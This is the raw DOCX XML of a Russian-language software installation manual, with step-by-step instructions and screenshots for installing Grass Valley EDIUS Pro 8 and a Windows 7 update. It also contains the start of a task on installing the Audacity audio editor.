                    <a:blip r:embed="rId90" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2289870" cy="2241651"/>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9.Переходим на страницу с обновлением: Обновление для системы безопасности Windows 7 для систем на базе 64-разрядных (x64) процессоров (KB3035131), выбираем язык интерфейса, и нажимаем на кнопку: Скачать.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2227350" cy="639725"/>
            <wp:effectExtent l="19050" t="0" r="1500" b="0"/>
            <wp:docPr id="165" name="Рисунок 199"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Установка Grass Valley EDIUS Pro 8"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId91" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2228198" cy="639969"/>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10.Запускаем скачанное обновление. Появится окно: Автономный установщик обновлений Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2018550" cy="756957"/>
            <wp:effectExtent l="19050" t="0" r="750" b="0"/>
            <wp:docPr id="166" name="Рисунок 200"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Установка Grass Valley EDIUS Pro 8"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId92" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2019501" cy="757314"/>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11.Автономный установщик обновлений Windows. Установить следующее обновление программного обеспечения Windows? Нажимаем на кнопку: Да.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2017915" cy="958050"/>
            <wp:effectExtent l="19050" t="0" r="1385" b="0"/>
            <wp:docPr id="167" name="Рисунок 201" descr="Grass Valley Ediu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Grass Valley Edius 8"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId93" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2032284" cy="964872"/>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12.Загрузка и установка обновлений. Состояние установки: выполняется инициализация установки... готово!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2017280" cy="1497968"/>
            <wp:effectExtent l="19050" t="0" r="2020" b="0"/>
            <wp:docPr id="181" name="Рисунок 202" descr="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Grass Valley EDIUS Pro 8"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId94" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2017649" cy="1498242"/>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13.Установка завершена. Необходимо перезагрузить компьютер, чтобы обновления вступили в силу. Нажимаем на кнопку: Перезагрузить сейчас.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2016645" cy="1497496"/>
            <wp:effectExtent l="19050" t="0" r="2655" b="0"/>
            <wp:docPr id="182" name="Рисунок 203"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Установка Grass Valley EDIUS Pro 8"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId95" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2021169" cy="1500855"/>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14.После перезагрузки ПК, снова запускаем файл EDIUS_DL_Setup-8.3.0.320.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1968150" cy="1255781"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="183" name="Рисунок 204" descr="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Grass Valley EDIUS Pro 8"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId96" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1974875" cy="1260072"/>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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Установщик</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows. Preparing to install...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2154080" cy="1289213"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="184" name="Рисунок 205" descr="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Grass Valley EDIUS Pro 8"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId97" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2157680" cy="1291368"/>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lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">15.EDIUS Setup. Welcome to the EDIUS Setup Wizard. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Нажимаем на кнопку: Next.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1910550" cy="1482662"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="185" name="Рисунок 206"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Установка Grass Valley EDIUS Pro 8"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId98" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1917386" cy="1487967"/>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16.При необходимости, изменяем директорию установки программы. Next.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1838550" cy="1426786"/>
            <wp:effectExtent l="19050" t="0" r="9300" b="0"/>
            <wp:docPr id="186" name="Рисунок 207"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Установка Grass Valley EDIUS Pro 8"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId99" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1844382" cy="1431312"/>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lastRenderedPageBreak/>
        <w:t>17.Для создания ярлыка программы на рабочем столе, оставляем галку перед пунктом: Do you want to create a desktop shortcut? Next.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1836860" cy="1425476"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="187" name="Рисунок 208"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Установка Grass Valley EDIUS Pro 8"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId100" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1844763" cy="1431609"/>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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>18.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Снимаем</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>галочку</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>перед</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>пунктом</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: Open the Web page to register user information after installing. Next.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1788150" cy="1387674"/>
            <wp:effectExtent l="19050" t="0" r="2550" b="0"/>
            <wp:docPr id="188" name="Рисунок 209"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Установка Grass Valley EDIUS Pro 8"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId101" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1793667" cy="1391956"/>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19.По окончании успешной устновки, нажимаем на кнопку: Готово.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1790631" cy="1389600"/>
            <wp:effectExtent l="19050" t="0" r="69" b="0"/>
            <wp:docPr id="189" name="Рисунок 210"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Установка Grass Valley EDIUS Pro 8"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId102" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1795267" cy="1393197"/>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Индикатор статуса установки программы EDIUS Pro 8.30.320.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1838550" cy="1426788"/>
            <wp:effectExtent l="19050" t="0" r="9300" b="0"/>
            <wp:docPr id="190" name="Рисунок 211" descr="Установка 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Установка Grass Valley EDIUS Pro 8"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId103" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1837713" cy="1426139"/>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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Запуск</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>утилиты</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> C:\Windows\system32\wevtutil.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>20.По окончании успешной установки, нажимаем на кнопку: Finish.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1838550" cy="1426787"/>
            <wp:effectExtent l="19050" t="0" r="9300" b="0"/>
            <wp:docPr id="27712" name="Рисунок 213" descr="Grass Valley Ediu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Grass Valley Edius 8"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId104" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1842720" cy="1430023"/>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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">21.EDIUS 8 Setup. Setup Successful. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Нажимаем</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>на</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>кнопку</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: Close.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1838550" cy="1173090"/>
            <wp:effectExtent l="19050" t="0" r="9300" b="0"/>
            <wp:docPr id="27713" name="Рисунок 214" descr="Grass Valley EDIUS Pr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Grass Valley EDIUS Pro 8"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId105" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1840043" cy="1174043"/>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22.Запускаем ярлык программы EDIUS 8 на рабочем столе. Появится окно, где попросят ввести серийный номер. При подключенном интернете, нажимаем на кнопку: EDIUS ID Web.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="0083647E" w:rsidP="00D22F20">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="88" w:name="_Toc507788513"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Задние </w:t>
      </w:r>
      <w:r w:rsidR="00D22F20" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4. Выявление и устранение проблем установки ПО для обработки звука. Составление инструкций для пользователя</w:t>
      </w:r>
      <w:bookmarkEnd w:id="88"/>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="main"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:right="138" w:firstLine="567"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="zagol1"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Задание: установка звукового редактора AUDACITY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="main"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:right="138" w:firstLine="567"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Прежде чем воспользоваться звуковым редактором Audacity, его нужно установить на компьютер. Приведенный ниже текст описывает установку в операционной системе Windows 7 собственно программы Audacity, а также библиотеки Lame MP3, которая позволяет сохранять отредактированный звуковой материал в формате MP3 (изначально сохранение звука в формате MP3 в редакторе невозможно).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</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Щелкаем по ссылке </w:t>
      </w:r>
      <w:hyperlink r:id="rId106" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>program</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> и в открывшемся окне дважды щелкаем по файлу audacity-win-2.0.exe. В открывшемся окне с вопросом </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Разрешить внесение изменений…</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> (рис. 1) щелкаем по кнопке </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Да</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543350" cy="949507"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="27714" name="Рисунок 241" descr="http://www.teatrbaby.ru/master_zvuk/images/im_audacity/ri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www.teatrbaby.ru/master_zvuk/images/im_audacity/ris1.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId107" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1551113" cy="954283"/>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 Разрешить внесение изменений..?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:pStyle w:val="main"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:right="138" w:firstLine="567"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>В следующем окне выбираем язык (Русский), который будет использован во время установки. Щелкаем по кнопке ОК (рис. 2).</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060950" cy="536782"/>
            <wp:effectExtent l="19050" t="0" r="5850" b="0"/>
